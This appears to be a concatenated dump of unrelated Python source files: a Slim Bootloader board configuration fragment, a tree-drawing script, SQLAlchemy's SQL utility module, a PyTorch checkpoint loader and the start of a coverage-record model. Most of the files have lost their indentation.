self.PLD_RSVD_MEM_SIZE = 0x00500000
self.PLD_HEAP_SIZE = 0x04000000
self.FWUPDATE_SIZE = 0x00020000
self.CFGDATA_SIZE = 0x00004000
self.KEYHASH_SIZE = 0x00001000
self.CFG_DATABASE_SIZE = self.CFGDATA_SIZE
self.MRCDATA_SIZE = 0x00004000
self.VARIABLE_SIZE = 0x00002000
self.S3_DEBUG = 0
self.SBLRSVD_SIZE = 0x00001000
if len(self._PAYLOAD_NAME.split(';')) > 1:
self.SPI_IAS1_SIZE = 0x00001000
else:
self.SPI_IAS1_SIZE = 0x00150000
self._CFGDATA_INT_FILE = ['CfgData_Int_LeafHill.dlt']
self._CFGDATA_EXT_FILE = ['CfgData_Ext_Gpmrb.dlt', 'CfgData_Ext_Up2.dlt','CfgData_Ext_OxbHill.dlt','CfgData_Ext_MB3.dlt','CfgData_Ext_JuniperHill.dlt']
        # If multiple VBT table support is required, list them as:
# {VbtImageId1 : VbtFileName1, VbtImageId2 : VbtFileName2, ...}
# VbtImageId is ID to identify a VBT image. It is a UINT32 number to match
# the ImageId field in the VBT container.
# VbtFileName is the VBT file name. It needs to be located under platform
# VbtBin folder.
self._MULTI_VBT_FILE = {1:'Vbt.dat', 2:'Vbt_Up2.dat'}
def GetPlatformDsc (self):
dsc = {}
common_libs = [
'LoaderLib|Platform/$(BOARD_PKG_NAME)/Library/LoaderLib/LoaderLib.inf',
'SerialPortLib|Silicon/$(SILICON_PKG_NAME)/Library/SerialPortLib/SerialPortLib.inf',
'SocInfoLib|Silicon/$(SILICON_PKG_NAME)/Library/SocInfoLib/SocInfoLib.inf',
'PlatformHookLib|Silicon/$(SILICON_PKG_NAME)/Library/PlatformHookLib/PlatformHookLib.inf',
'ScSbiAccessLib|Silicon/$(SILICON_PKG_NAME)/Library/ScSbiAccessLib/ScSbiAccessLib.inf',
'GpioLib|Silicon/$(SILICON_PKG_NAME)/Library/GpioLib/GpioLib.inf',
'PchSpiLib|Silicon/CommonSocPkg/Library/PchSpiLib/PchSpiLib.inf',
'SpiFlashLib|Silicon/CommonSocPkg/Library/SpiFlashLib/SpiFlashLib.inf',
'IgdOpRegionLib|Silicon/$(SILICON_PKG_NAME)/Library/IgdOpRegionLib/IgdOpRegionLib.inf',
'IocIpcLib|Platform/$(BOARD_PKG_NAME)/Library/IocIpcLib/IocIpcLib.inf',
'BootGuardLib|Silicon/$(SILICON_PKG_NAME)/Library/BootGuardLib20/BootGuardLib20.inf',
'HeciLib|Silicon/ApollolakePkg/Library/HeciLib/HeciLib.inf',
'PsdLib|Silicon/ApollolakePkg/Library/PsdLib/PsdLib.inf',
'ShellExtensionLib|Platform/$(BOARD_PKG_NAME)/Library/ShellExtensionLib/ShellExtensionLib.inf',
'BootMediaLib|Silicon/ApollolakePkg/Library/BootMediaLib/BootMediaLib.inf',
'FlashDescriptorLib|Silicon/ApollolakePkg/Library/FlashDescriptorLib/FlashDescriptorLib.inf',
'VtdLib|Silicon/$(SILICON_PKG_NAME)/Library/VtdLib/VtdLib.inf',
'SmbusLib|Silicon/$(SILICON_PKG_NAME)/Library/SmbusLib/SmbusLib.inf',
'HdaLib|Platform/$(BOARD_PKG_NAME)/Library/HdaLib/HdaLib.inf',
'VtdPmrLib|Silicon/CommonSocPkg/Library/VtdPmrLib/VtdPmrLib.inf',
'BaseIpcLib|Silicon/$(SILICON_PKG_NAME)/Library/BaseIpcLib/BaseIpcLib.inf'
]
dsc['LibraryClasses.%s' % self.BUILD_ARCH] = common_libs
return dsc
def GetFlashMapList (self):
img_list = self.GetImageLayout ()
comp_list = []
offset = 0
# Skip Stitch_IPAD and Stitch_OPAD for flash map
for img in img_list[2:][::-1]:
child = img[1][0]
if child[3] & STITCH_OPS.MODE_FILE_IGNOR:
continue
bname = os.path.splitext(child[0])[0]
comp = {'name':child[0], 'bname':bname, 'offset':offset, 'size':child[2], 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['COMPRESSED'] if child[1] else 0}
if bname in ['STAGE1A', 'STAGE1B', 'STAGE2', 'FWUPDATE', 'CFGDATA', 'MRCDATA', 'PAYLOAD', 'VARIABLE']:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
else:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']
comp_list.append (comp)
offset += child[2]
flag = FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
comp_list.append ({'name':'SBLRSVD.bin','bname':'SBLRSVD','offset':0, 'size':self.SBLRSVD_SIZE, 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']})
comp_list.append ({'name':'BPM.bin', 'bname':'BPM', 'offset':0, 'size':0, 'flag': flag})
return comp_list[::-1]
def GetOutputImages (self):
# define extra images that will be copied to output folder
img_list = ['SlimBootloader.txt',
'CfgDataStitch.py',
'CfgDataDef.yaml',
'CfgDataInt.bin'
]
return img_list
def GetKeyHashList (self):
# Define a set of new key used for different purposes
# The key is either key id or public key PEM format or private key PEM format
pub_key_list = [
(
# Key for verifying Config data blob
HASH_USAGE['PUBKEY_CFG_DATA'],
'KEY_ID_CFGDATA' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying firmware update
HASH_USAGE['PUBKEY_FWU'],
'KEY_ID_FIRMWAREUPDATE' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying container header
HASH_USAGE['PUBKEY_CONT_DEF'],
'KEY_ID_CONTAINER' + '_' + self._RSA_SIGN_TYPE
),
(
# key for veryfying OS image.
HASH_USAGE['PUBKEY_OS'],
'KEY_ID_OS1_PUBLIC' + '_' + self._RSA_SIGN_TYPE
),
]
return pub_key_list
def GetImageLayout (self):
ias1_flag = 0 if self.SPI_IAS1_SIZE > 0 else STITCH_OPS.MODE_FILE_IGNOR
fwu_flag = 0 if self.ENABLE_FWU else STITCH_OPS.MODE_FILE_IGNOR
img_list = []
img_list.extend ([
# Padding to ensure all other components in OBB partition will be aligned at 4KB boundary
# 0xB00 assumes (IBBP.man, BPM.met) + (IPAD, IBBL, IBBM, OBB, FWUP, CFGD, PLD, VAR, MRCD) in BpdtIBB
# 0x180 assumes (OPAD, PROV, EPLD) in BpdtOBB
# If more files are added, the offset needs to be adjusted accordingly
('Stitch_IPAD.bin', [
('PADDING.bin', '', 0xB00, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OPAD.bin', [
('PADDING.bin', '', 0x180, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FWU.bin', [
('FWUPDATE.bin' , 'Lzma', self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FB.bin', [
('SPI_IAS1.bin', '', self.SPI_IAS1_SIZE, STITCH_OPS.MODE_FILE_PAD | ias1_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_PLD.bin', [
('PAYLOAD.bin', 'Lz4', self.PAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_VAR.bin', [
('VARIABLE.bin', '', self.VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_MRCDATA.bin', [
('MRCDATA.bin', '', self.MRCDATA_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_CFGDATA.bin', [
('CFGDATA.bin', '', self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_KEYHASH.bin', [
('KEYHASH.bin', '', self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OBB.bin', [
('STAGE2.fd', 'Lz4', self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBM.bin', [
('STAGE1B.fd', 'Lz4', self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBL.bin', [
('STAGE1A.fd', '', self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_EPLD.bin', [
('EPAYLOAD.bin', '', self.EPAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_UVAR.bin', [
('UEFIVARIABLE.bin', '', self.UEFI_VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)],
),
])
return img_list
|
py | 1a3f7d233b700bf20b859088661edd66b35a9b84 | from gen import Tree
from demo_trees import trees
import ws1
reload(ws1)
from ws1 import layout
t = layout(trees[4])
r = 30
rh = r*1.5
rw = r*1.5
stroke(0)
def drawt(root, depth):
global r
oval(root.x * rw, depth * rh, r, r)
print root.x
for child in root.children:
drawt(child, depth+1)
def drawconn(root, depth):
for child in root.children:
line(root.x * rw + (r/2), depth * rh + (r/2),
child.x * rw + (r/2), (depth+1) * rh + (r/2))
drawconn(child, depth+1)
size(1000, 500)
translate(2, 2)
stroke(0)
drawconn(t, 0)
fill(1,1,1)
drawt(t, 0) |
py | 1a3f7d2f8fdf299395daf5de798143893734973b | # sql/util.py
# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from sqlalchemy import exc, schema, util, sql, types as sqltypes
from sqlalchemy.util import topological
from sqlalchemy.sql import expression, operators, visitors
from itertools import chain
"""Utility functions that build upon SQL and Schema constructs."""
def sort_tables(tables):
"""sort a collection of Table objects in order of their foreign-key dependency."""
tables = list(tables)
tuples = []
def visit_foreign_key(fkey):
if fkey.use_alter:
return
parent_table = fkey.column.table
if parent_table in tables:
child_table = fkey.parent.table
if parent_table is not child_table:
tuples.append((parent_table, child_table))
for table in tables:
visitors.traverse(table,
{'schema_visitor':True},
{'foreign_key':visit_foreign_key})
tuples.extend(
[parent, table] for parent in table._extra_dependencies
)
return list(topological.sort(tuples, tables))
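# Example (illustrative, not part of the original module): if 'child' has a
# ForeignKey to 'parent', sort_tables([child, parent]) yields [parent, child],
# i.e. referenced tables come before the tables that depend on them.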
def find_join_source(clauses, join_to):
"""Given a list of FROM clauses and a selectable,
return the first index and element from the list of
clauses which can be joined against the selectable. returns
None, None if no match is found.
e.g.::
clause1 = table1.join(table2)
clause2 = table4.join(table5)
join_to = table2.join(table3)
find_join_source([clause1, clause2], join_to) == clause1
"""
selectables = list(expression._from_objects(join_to))
for i, f in enumerate(clauses):
for s in selectables:
if f.is_derived_from(s):
return i, f
else:
return None, None
def find_tables(clause, check_columns=False,
include_aliases=False, include_joins=False,
include_selects=False, include_crud=False):
"""locate Table objects within the given expression."""
tables = []
_visitors = {}
if include_selects:
_visitors['select'] = _visitors['compound_select'] = tables.append
if include_joins:
_visitors['join'] = tables.append
if include_aliases:
_visitors['alias'] = tables.append
if include_crud:
_visitors['insert'] = _visitors['update'] = \
_visitors['delete'] = lambda ent: tables.append(ent.table)
if check_columns:
def visit_column(column):
tables.append(column.table)
_visitors['column'] = visit_column
_visitors['table'] = tables.append
visitors.traverse(clause, {'column_collections':False}, _visitors)
return tables
def find_columns(clause):
"""locate Column objects within the given expression."""
cols = util.column_set()
visitors.traverse(clause, {}, {'column':cols.add})
return cols
def clause_is_present(clause, search):
"""Given a target clause and a second to search within, return True
if the target is plainly present in the search without any
subqueries or aliases involved.
Basically descends through Joins.
"""
stack = [search]
while stack:
elem = stack.pop()
if clause is elem:
return True
elif isinstance(elem, expression.Join):
stack.extend((elem.left, elem.right))
return False
def bind_values(clause):
"""Return an ordered list of "bound" values in the given clause.
E.g.::
>>> expr = and_(
... table.c.foo==5, table.c.foo==7
... )
>>> bind_values(expr)
[5, 7]
"""
v = []
def visit_bindparam(bind):
value = bind.value
# evaluate callables
if callable(value):
value = value()
v.append(value)
visitors.traverse(clause, {}, {'bindparam':visit_bindparam})
return v
def _quote_ddl_expr(element):
if isinstance(element, basestring):
element = element.replace("'", "''")
return "'%s'" % element
else:
return repr(element)
def expression_as_ddl(clause):
"""Given a SQL expression, convert for usage in DDL, such as
CREATE INDEX and CHECK CONSTRAINT.
Converts bind params into quoted literals, column identifiers
into detached column constructs so that the parent table
identifier is not included.
"""
def repl(element):
if isinstance(element, expression._BindParamClause):
return expression.literal_column(_quote_ddl_expr(element.value))
elif isinstance(element, expression.ColumnClause) and \
element.table is not None:
return expression.column(element.name)
else:
return None
return visitors.replacement_traverse(clause, {}, repl)
def adapt_criterion_to_null(crit, nulls):
"""given criterion containing bind params, convert selected elements to IS NULL."""
def visit_binary(binary):
if isinstance(binary.left, expression._BindParamClause) and binary.left.key in nulls:
# reverse order if the NULL is on the left side
binary.left = binary.right
binary.right = expression.null()
binary.operator = operators.is_
binary.negate = operators.isnot
elif isinstance(binary.right, expression._BindParamClause) and binary.right.key in nulls:
binary.right = expression.null()
binary.operator = operators.is_
binary.negate = operators.isnot
return visitors.cloned_traverse(crit, {}, {'binary':visit_binary})
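# Example (illustrative): adapt_criterion_to_null(tbl.c.x == bindparam('x'), {'x'})
# rewrites the comparison into "tbl.c.x IS NULL", with the negation set to IS NOT NULL.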
def join_condition(a, b, ignore_nonexistent_tables=False, a_subset=None):
"""create a join condition between two tables or selectables.
e.g.::
join_condition(tablea, tableb)
would produce an expression along the lines of::
tablea.c.id==tableb.c.tablea_id
The join is determined based on the foreign key relationships
between the two selectables. If there are multiple ways
to join, or no way to join, an error is raised.
:param ignore_nonexistent_tables: Deprecated - this
flag is no longer used. Only resolution errors regarding
the two given tables are propagated.
:param a_subset: An optional expression that is a sub-component
of ``a``. An attempt will be made to join to just this sub-component
first before looking at the full ``a`` construct, and if found
will be successful even if there are other ways to join to ``a``.
This allows the "right side" of a join to be passed thereby
providing a "natural join".
"""
crit = []
constraints = set()
for left in (a_subset, a):
if left is None:
continue
for fk in sorted(
b.foreign_keys,
key=lambda fk:fk.parent._creation_order):
try:
col = fk.get_referent(left)
except exc.NoReferenceError, nrte:
if nrte.table_name == left.name:
raise
else:
continue
if col is not None:
crit.append(col == fk.parent)
constraints.add(fk.constraint)
if left is not b:
for fk in sorted(
left.foreign_keys,
key=lambda fk:fk.parent._creation_order):
try:
col = fk.get_referent(b)
except exc.NoReferenceError, nrte:
if nrte.table_name == b.name:
raise
else:
# this is totally covered. can't get
# coverage to mark it.
continue
if col is not None:
crit.append(col == fk.parent)
constraints.add(fk.constraint)
if crit:
break
if len(crit) == 0:
if isinstance(b, expression._FromGrouping):
hint = " Perhaps you meant to convert the right side to a "\
"subquery using alias()?"
else:
hint = ""
raise exc.ArgumentError(
"Can't find any foreign key relationships "
"between '%s' and '%s'.%s" % (a.description, b.description, hint))
elif len(constraints) > 1:
raise exc.ArgumentError(
"Can't determine join between '%s' and '%s'; "
"tables have more than one foreign key "
"constraint relationship between them. "
"Please specify the 'onclause' of this "
"join explicitly." % (a.description, b.description))
elif len(crit) == 1:
return (crit[0])
else:
return sql.and_(*crit)
class Annotated(object):
"""clones a ClauseElement and applies an 'annotations' dictionary.
Unlike regular clones, this clone also mimics __hash__() and
__cmp__() of the original element so that it takes its place
in hashed collections.
A reference to the original element is maintained, for the important
reason of keeping its hash value current. When GC'ed, the
hash value may be reused, causing conflicts.
"""
def __new__(cls, *args):
if not args:
# clone constructor
return object.__new__(cls)
else:
element, values = args
# pull appropriate subclass from registry of annotated
# classes
try:
cls = annotated_classes[element.__class__]
except KeyError:
cls = annotated_classes[element.__class__] = type.__new__(type,
"Annotated%s" % element.__class__.__name__,
(Annotated, element.__class__), {})
return object.__new__(cls)
def __init__(self, element, values):
# force FromClause to generate their internal
# collections into __dict__
if isinstance(element, expression.FromClause):
element.c
self.__dict__ = element.__dict__.copy()
self.__element = element
self._annotations = values
def _annotate(self, values):
_values = self._annotations.copy()
_values.update(values)
clone = self.__class__.__new__(self.__class__)
clone.__dict__ = self.__dict__.copy()
clone._annotations = _values
return clone
def _deannotate(self):
return self.__element
def _compiler_dispatch(self, visitor, **kw):
return self.__element.__class__._compiler_dispatch(self, visitor, **kw)
@property
def _constructor(self):
return self.__element._constructor
def _clone(self):
clone = self.__element._clone()
if clone is self.__element:
# detect immutable, don't change anything
return self
else:
# update the clone with any changes that have occurred
# to this object's __dict__.
clone.__dict__.update(self.__dict__)
return Annotated(clone, self._annotations)
def __hash__(self):
return hash(self.__element)
def __cmp__(self, other):
return cmp(hash(self.__element), hash(other))
# hard-generate Annotated subclasses. this technique
# is used instead of on-the-fly types (i.e. type.__new__())
# so that the resulting objects are pickleable.
annotated_classes = {}
for cls in expression.__dict__.values() + [schema.Column, schema.Table]:
if isinstance(cls, type) and issubclass(cls, expression.ClauseElement):
exec "class Annotated%s(Annotated, cls):\n" \
" pass" % (cls.__name__, ) in locals()
exec "annotated_classes[cls] = Annotated%s" % (cls.__name__)
def _deep_annotate(element, annotations, exclude=None):
"""Deep copy the given ClauseElement, annotating each element with the given annotations dictionary.
Elements within the exclude collection will be cloned but not annotated.
"""
def clone(elem):
# check if element is present in the exclude list.
# take into account proxying relationships.
if exclude and \
hasattr(elem, 'proxy_set') and \
elem.proxy_set.intersection(exclude):
elem = elem._clone()
elif annotations != elem._annotations:
elem = elem._annotate(annotations.copy())
elem._copy_internals(clone=clone)
return elem
if element is not None:
element = clone(element)
return element
def _deep_deannotate(element):
"""Deep copy the given element, removing all annotations."""
def clone(elem):
elem = elem._deannotate()
elem._copy_internals(clone=clone)
return elem
if element is not None:
element = clone(element)
return element
def splice_joins(left, right, stop_on=None):
if left is None:
return right
stack = [(right, None)]
adapter = ClauseAdapter(left)
ret = None
while stack:
(right, prevright) = stack.pop()
if isinstance(right, expression.Join) and right is not stop_on:
right = right._clone()
right._reset_exported()
right.onclause = adapter.traverse(right.onclause)
stack.append((right.left, right))
else:
right = adapter.traverse(right)
if prevright is not None:
prevright.left = right
if ret is None:
ret = right
return ret
def reduce_columns(columns, *clauses, **kw):
"""given a list of columns, return a 'reduced' set based on natural equivalents.
the set is reduced to the smallest list of columns which have no natural
equivalent present in the list. A "natural equivalent" means that two columns
will ultimately represent the same value because they are related by a foreign key.
\*clauses is an optional list of join clauses which will be traversed
to further identify columns that are "equivalent".
\**kw may specify 'ignore_nonexistent_tables' to ignore foreign keys
whose tables are not yet configured.
This function is primarily used to determine the most minimal "primary key"
from a selectable, by reducing the set of primary key columns present
    in the selectable to just those that are not repeated.
"""
ignore_nonexistent_tables = kw.pop('ignore_nonexistent_tables', False)
columns = util.ordered_column_set(columns)
omit = util.column_set()
for col in columns:
for fk in chain(*[c.foreign_keys for c in col.proxy_set]):
for c in columns:
if c is col:
continue
try:
fk_col = fk.column
except exc.NoReferencedTableError:
if ignore_nonexistent_tables:
continue
else:
raise
if fk_col.shares_lineage(c):
omit.add(col)
break
if clauses:
def visit_binary(binary):
if binary.operator == operators.eq:
cols = util.column_set(chain(*[c.proxy_set for c in columns.difference(omit)]))
if binary.left in cols and binary.right in cols:
for c in columns:
if c.shares_lineage(binary.right):
omit.add(c)
break
for clause in clauses:
visitors.traverse(clause, {}, {'binary':visit_binary})
return expression.ColumnSet(columns.difference(omit))
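# Illustrative example (not part of the original module): given child.c.id that is
# a ForeignKey onto parent.c.id, reduce_columns([parent.c.id, child.c.id]) omits
# child.c.id and returns just [parent.c.id], since both represent the same value.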
def criterion_as_pairs(expression, consider_as_foreign_keys=None,
consider_as_referenced_keys=None, any_operator=False):
"""traverse an expression and locate binary criterion pairs."""
if consider_as_foreign_keys and consider_as_referenced_keys:
raise exc.ArgumentError("Can only specify one of "
"'consider_as_foreign_keys' or "
"'consider_as_referenced_keys'")
def visit_binary(binary):
if not any_operator and binary.operator is not operators.eq:
return
if not isinstance(binary.left, sql.ColumnElement) or \
not isinstance(binary.right, sql.ColumnElement):
return
if consider_as_foreign_keys:
if binary.left in consider_as_foreign_keys and \
(binary.right is binary.left or
binary.right not in consider_as_foreign_keys):
pairs.append((binary.right, binary.left))
elif binary.right in consider_as_foreign_keys and \
(binary.left is binary.right or
binary.left not in consider_as_foreign_keys):
pairs.append((binary.left, binary.right))
elif consider_as_referenced_keys:
if binary.left in consider_as_referenced_keys and \
(binary.right is binary.left or
binary.right not in consider_as_referenced_keys):
pairs.append((binary.left, binary.right))
elif binary.right in consider_as_referenced_keys and \
(binary.left is binary.right or
binary.left not in consider_as_referenced_keys):
pairs.append((binary.right, binary.left))
else:
if isinstance(binary.left, schema.Column) and \
isinstance(binary.right, schema.Column):
if binary.left.references(binary.right):
pairs.append((binary.right, binary.left))
elif binary.right.references(binary.left):
pairs.append((binary.left, binary.right))
pairs = []
visitors.traverse(expression, {}, {'binary':visit_binary})
return pairs
def folded_equivalents(join, equivs=None):
"""Return a list of uniquely named columns.
The column list of the given Join will be narrowed
down to a list of all equivalently-named,
equated columns folded into one column, where 'equated' means they are
equated to each other in the ON clause of this join.
This function is used by Join.select(fold_equivalents=True).
Deprecated. This function is used for a certain kind of
"polymorphic_union" which is designed to achieve joined
table inheritance where the base table has no "discriminator"
column; [ticket:1131] will provide a better way to
achieve this.
"""
if equivs is None:
equivs = set()
def visit_binary(binary):
if binary.operator == operators.eq and binary.left.name == binary.right.name:
equivs.add(binary.right)
equivs.add(binary.left)
visitors.traverse(join.onclause, {}, {'binary':visit_binary})
collist = []
if isinstance(join.left, expression.Join):
left = folded_equivalents(join.left, equivs)
else:
left = list(join.left.columns)
if isinstance(join.right, expression.Join):
right = folded_equivalents(join.right, equivs)
else:
right = list(join.right.columns)
used = set()
for c in left + right:
if c in equivs:
if c.name not in used:
collist.append(c)
used.add(c.name)
else:
collist.append(c)
return collist
class AliasedRow(object):
"""Wrap a RowProxy with a translation map.
This object allows a set of keys to be translated
to those present in a RowProxy.
"""
def __init__(self, row, map):
# AliasedRow objects don't nest, so un-nest
# if another AliasedRow was passed
if isinstance(row, AliasedRow):
self.row = row.row
else:
self.row = row
self.map = map
def __contains__(self, key):
return self.map[key] in self.row
def has_key(self, key):
return key in self
def __getitem__(self, key):
return self.row[self.map[key]]
def keys(self):
return self.row.keys()
class ClauseAdapter(visitors.ReplacingCloningVisitor):
"""Clones and modifies clauses based on column correspondence.
E.g.::
table1 = Table('sometable', metadata,
Column('col1', Integer),
Column('col2', Integer)
)
table2 = Table('someothertable', metadata,
Column('col1', Integer),
Column('col2', Integer)
)
condition = table1.c.col1 == table2.c.col1
make an alias of table1::
s = table1.alias('foo')
calling ``ClauseAdapter(s).traverse(condition)`` converts
condition to read::
s.c.col1 == table2.c.col1
"""
def __init__(self, selectable, equivalents=None, include=None, exclude=None):
self.__traverse_options__ = {'column_collections':False, 'stop_on':[selectable]}
self.selectable = selectable
self.include = include
self.exclude = exclude
self.equivalents = util.column_dict(equivalents or {})
def _corresponding_column(self, col, require_embedded, _seen=util.EMPTY_SET):
newcol = self.selectable.corresponding_column(col, require_embedded=require_embedded)
if newcol is None and col in self.equivalents and col not in _seen:
for equiv in self.equivalents[col]:
newcol = self._corresponding_column(equiv, require_embedded=require_embedded, _seen=_seen.union([col]))
if newcol is not None:
return newcol
return newcol
def replace(self, col):
if isinstance(col, expression.FromClause):
if self.selectable.is_derived_from(col):
return self.selectable
if not isinstance(col, expression.ColumnElement):
return None
if self.include and col not in self.include:
return None
elif self.exclude and col in self.exclude:
return None
return self._corresponding_column(col, True)
class ColumnAdapter(ClauseAdapter):
"""Extends ClauseAdapter with extra utility functions.
Provides the ability to "wrap" this ClauseAdapter
around another, a columns dictionary which returns
adapted elements given an original, and an
adapted_row() factory.
"""
def __init__(self, selectable, equivalents=None,
chain_to=None, include=None,
exclude=None, adapt_required=False):
ClauseAdapter.__init__(self, selectable, equivalents, include, exclude)
if chain_to:
self.chain(chain_to)
self.columns = util.populate_column_dict(self._locate_col)
self.adapt_required = adapt_required
def wrap(self, adapter):
ac = self.__class__.__new__(self.__class__)
ac.__dict__ = self.__dict__.copy()
ac._locate_col = ac._wrap(ac._locate_col, adapter._locate_col)
ac.adapt_clause = ac._wrap(ac.adapt_clause, adapter.adapt_clause)
ac.adapt_list = ac._wrap(ac.adapt_list, adapter.adapt_list)
ac.columns = util.populate_column_dict(ac._locate_col)
return ac
adapt_clause = ClauseAdapter.traverse
adapt_list = ClauseAdapter.copy_and_process
def _wrap(self, local, wrapped):
def locate(col):
col = local(col)
return wrapped(col)
return locate
def _locate_col(self, col):
c = self._corresponding_column(col, True)
if c is None:
c = self.adapt_clause(col)
# anonymize labels in case they have a hardcoded name
if isinstance(c, expression._Label):
c = c.label(None)
# adapt_required indicates that if we got the same column
# back which we put in (i.e. it passed through),
# it's not correct. this is used by eagerloading which
# knows that all columns and expressions need to be adapted
# to a result row, and a "passthrough" is definitely targeting
# the wrong column.
if self.adapt_required and c is col:
return None
return c
def adapted_row(self, row):
return AliasedRow(row, self.columns)
def __getstate__(self):
d = self.__dict__.copy()
del d['columns']
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.columns = util.PopulateDict(self._locate_col)
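# A minimal usage sketch of ClauseAdapter, restating the docstring example above in
# runnable form (the Table/Column/metadata names are illustrative and assume the usual
# sqlalchemy imports, which this excerpt does not show):
#
#   table1 = Table('sometable', metadata,
#                  Column('col1', Integer), Column('col2', Integer))
#   table2 = Table('someothertable', metadata,
#                  Column('col1', Integer), Column('col2', Integer))
#   condition = table1.c.col1 == table2.c.col1
#
#   s = table1.alias('foo')
#   adapted = ClauseAdapter(s).traverse(condition)
#   # str(adapted) now compares foo.col1 to someothertable.col1
#
# ColumnAdapter adds the `columns` lookup dict and adapted_row(), which translate
# result rows produced against the aliased selectable back to the original columns.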
|
py | 1a3f7d7d0c880fa97c9bc28afce11ae01d03db01 | import torch
import os
from collections import OrderedDict
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
def load_checkpoint(model, checkpoint_path):
if checkpoint_path and os.path.isfile(checkpoint_path):
print("=> Loading checkpoint '{}'".format(checkpoint_path))
checkpoint = torch.load(checkpoint_path)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
new_state_dict = OrderedDict()
for k, v in checkpoint['state_dict'].items():
if k.startswith('module'):
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
else:
model.load_state_dict(checkpoint)
print("=> Loaded checkpoint '{}'".format(checkpoint_path))
else:
print("=> Error: No checkpoint found at '{}'".format(checkpoint_path))
raise FileNotFoundError()
def load_pretrained(model, url, filter_fn=None, strict=True):
state_dict = load_state_dict_from_url(url, progress=False, map_location='cpu')
input_conv = 'conv_stem'
classifier = 'classifier'
in_chans = getattr(model, input_conv).weight.shape[1]
num_classes = getattr(model, classifier).weight.shape[0]
input_conv_weight = input_conv + '.weight'
pretrained_in_chans = state_dict[input_conv_weight].shape[1]
if in_chans != pretrained_in_chans:
if in_chans == 1:
print('=> Converting pretrained input conv {} from {} to 1 channel'.format(
input_conv_weight, pretrained_in_chans))
conv1_weight = state_dict[input_conv_weight]
state_dict[input_conv_weight] = conv1_weight.sum(dim=1, keepdim=True)
else:
print('=> Discarding pretrained input conv {} since input channel count != {}'.format(
input_conv_weight, pretrained_in_chans))
del state_dict[input_conv_weight]
strict = False
classifier_weight = classifier + '.weight'
pretrained_num_classes = state_dict[classifier_weight].shape[0]
if num_classes != pretrained_num_classes:
print('=> Discarding pretrained classifier since num_classes != {}'.format(pretrained_num_classes))
del state_dict[classifier_weight]
del state_dict[classifier + '.bias']
strict = False
if filter_fn is not None:
state_dict = filter_fn(state_dict)
model.load_state_dict(state_dict, strict=strict)
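# Hedged usage sketch -- the model class, checkpoint path and URL below are
# placeholders, not part of this module:
#
#   model = GenEfficientNet(num_classes=10, in_chans=1)    # any nn.Module exposing
#                                                           # `conv_stem` and `classifier`
#   load_checkpoint(model, './output/checkpoint.pth.tar')   # resume local training state
#   load_pretrained(model, url=PRETRAINED_URL)              # or adapt released weights
#
# load_pretrained() sums the pretrained stem conv down to one channel (in_chans == 1)
# or discards it, and discards the classifier weights, whenever the shapes disagree;
# in those cases it automatically falls back to strict=False loading.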
|
py | 1a3f7ec2904b58a990fe825dab0c17397541c799 | # encoding: utf-8
# BaseCoverageRecord, Timestamp, CoverageRecord, WorkCoverageRecord
from . import (
Base,
get_one,
get_one_or_create,
)
import datetime
from sqlalchemy import (
Column,
DateTime,
Enum,
ForeignKey,
Index,
Integer,
String,
Unicode,
UniqueConstraint,
)
from sqlalchemy.orm.session import Session
from sqlalchemy.sql.expression import (
and_,
or_,
literal,
literal_column,
)
class BaseCoverageRecord(object):
"""Contains useful constants used by both CoverageRecord and
WorkCoverageRecord.
"""
SUCCESS = u'success'
TRANSIENT_FAILURE = u'transient failure'
PERSISTENT_FAILURE = u'persistent failure'
REGISTERED = u'registered'
ALL_STATUSES = [REGISTERED, SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# Count coverage as attempted if the record is not 'registered'.
PREVIOUSLY_ATTEMPTED = [SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# By default, count coverage as present if it ended in
# success or in persistent failure. Do not count coverage
# as present if it ended in transient failure.
DEFAULT_COUNT_AS_COVERED = [SUCCESS, PERSISTENT_FAILURE]
status_enum = Enum(SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE,
REGISTERED, name='coverage_status')
@classmethod
